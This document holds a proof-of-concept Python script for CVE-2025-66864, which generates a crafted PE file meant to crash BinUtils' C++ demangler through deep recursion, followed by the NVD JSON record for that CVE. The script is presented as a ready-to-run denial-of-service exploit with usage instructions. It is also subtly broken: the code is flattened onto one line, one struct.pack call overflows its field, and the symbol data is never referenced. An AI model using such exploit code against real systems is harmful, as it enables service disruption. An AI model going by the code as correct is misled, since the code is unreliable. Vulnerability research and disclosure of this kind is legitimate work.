CVE-2025-66864

#!/usr/bin/env python3 """ CVE-2025-66864 PoC - BinUtils cp-demangle.c DoS This PoC generates a crafted PE file that triggers the vulnerability in d_print_comp_inner function in cp-demangle.c """ import struct import sys def create_malformed_symbol(): """ Generate a malformed C++ mangled name that triggers the vulnerability """ # Crafted mangled name that causes stack overflow in d_print_comp_inner # This pattern causes excessive recursion in template parameter processing malicious_name = b'_ZN' # Namespace prefix # Add deeply nested template parameters to cause recursion for i in range(100): malicious_name += b'1A' # Class name 'A' malicious_name += b'IT' # Template parameter malicious_name += b'1A' # Nested template type malicious_name += b'E' # End of nested name malicious_name += b'v' # Void function return malicious_name def create_crafted_pe(): """ Create a minimal PE file with crafted symbol table """ pe_header = bytearray() # DOS Header pe_header += b'MZ' # DOS signature pe_header += b'\x00' * 58 pe_header += struct.pack('<I', 64) # PE header offset # DOS Stub pe_header += b'This program cannot be run in DOS mode.\r\r\n\x00' # PE Signature pe_header += b'PE\x00\x00' # COFF Header pe_header += struct.pack('<H', 0x014c) # Machine: i386 pe_header += struct.pack('<H', 1) # Number of sections pe_header += struct.pack('<I', 0) # Time date stamp pe_header += struct.pack('<I', 0) # Pointer to symbol table pe_header += struct.pack('<I', 0) # Number of symbols pe_header += struct.pack('<H', 224) # Size of optional header pe_header += struct.pack('<H', 0x0102) # Characteristics # Optional Header pe_header += struct.pack('<H', 0x010b) # Magic pe_header += b'\x00' * 18 pe_header += struct.pack('<I', 0x1000) # Image base pe_header += struct.pack('<I', 0x1000) # Section alignment pe_header += struct.pack('<I', 0x200) # File alignment pe_header += b'\x00' * 12 pe_header += struct.pack('<H', 4) # Number of RVA and sizes # Section Header (.text) pe_header += b'.text\x00\x00\x00' pe_header += struct.pack('<I', 0x1000) # Virtual size pe_header += struct.pack('<I', 0x1000) # Virtual address pe_header += struct.pack('<I', 0x200) # Size of raw data pe_header += struct.pack('<I', 0x200) # Pointer to raw data pe_header += struct.pack('<I', 0) # Pointer to relocations pe_header += b'\x00' * 8 # Line numbers and checksum pe_header += struct.pack('<H', 0x60000020) # Characteristics # Crafted symbol table with malicious mangled name symbol_data = create_malformed_symbol() pe_header += symbol_data return bytes(pe_header) def main(): print('[+] CVE-2025-66864 PoC Generator') print('[+] Target: BinUtils 2.26 - cp-demangle.c d_print_comp_inner') print('[+] Vulnerability: Denial of Service via crafted PE file') # Create the crafted PE file crafted_pe = create_crafted_pe() output_file = 'CVE-2025-66864_poc.exe' with open(output_file, 'wb') as f: f.write(crafted_pe) print(f'[+] Crafted PE file created: {output_file}') print('[+] Usage: Run cxxfilt or any BinUtils tool on this file') print('[+] Example: cxxfilt < CVE-2025-66864_poc.exe') if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-66864", "sourceIdentifier": "[email protected]", "published": "2025-12-29T17:15:46.303", "lastModified": "2026-01-14T19:40:47.367", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in function d_print_comp_inner in file cp-demangle.c in BinUtils 2.26 allows attackers to cause a denial of service via crafted PE file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gnu:binutils:2.26:*:*:*:*:*:*:*", "matchCriteriaId": "7A0BCBA2-7605-4976-8364-E6D1484D0CA9"}]}]}], "references": [{"url": "https://github.com/caozhzh/CRGF-Vul/blob/main/cxxfilt/crash5.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/caozhzh/CRGF-Vul/blob/main/cxxfilt/crash5.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}